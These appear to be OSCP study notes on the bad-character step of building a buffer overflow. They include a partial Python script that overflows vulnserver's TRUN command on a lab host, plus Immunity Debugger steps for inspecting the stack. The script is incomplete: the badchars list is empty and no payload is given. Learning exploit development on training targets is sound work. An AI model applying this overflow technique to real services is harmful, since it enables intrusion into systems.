OSCP Learning Notes - Buffer Overflows(3)

Finding Bad Characters

1. Find the bad charaters in the following website:


2. Write the Python test script using the badchars.

import socket
import sys

badchars = (


shellcode = "A" * 2003 + "B" * 4 + badchars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    connect = s.connect(('10.0.0.XX',9999))
    s.send(('TRUN /.:/' + shellcode))
    print "check debugger"


3. Start the vulnserver on the Windows OS and Immunity Debugger to monitor this program.

OSCP Learning Notes - Buffer Overflows(3)

4.Execute the script, the vulnserver is crashed. Then analysts it.


5. After executed the scirpt, the vulnserver crashed.

OSCP Learning Notes - Buffer Overflows(3)

 6. Right click on the ESP value, and select Follow in Dump.

OSCP Learning Notes - Buffer Overflows(3)

7. Analyst the ASCII

OSCP Learning Notes - Buffer Overflows(3)


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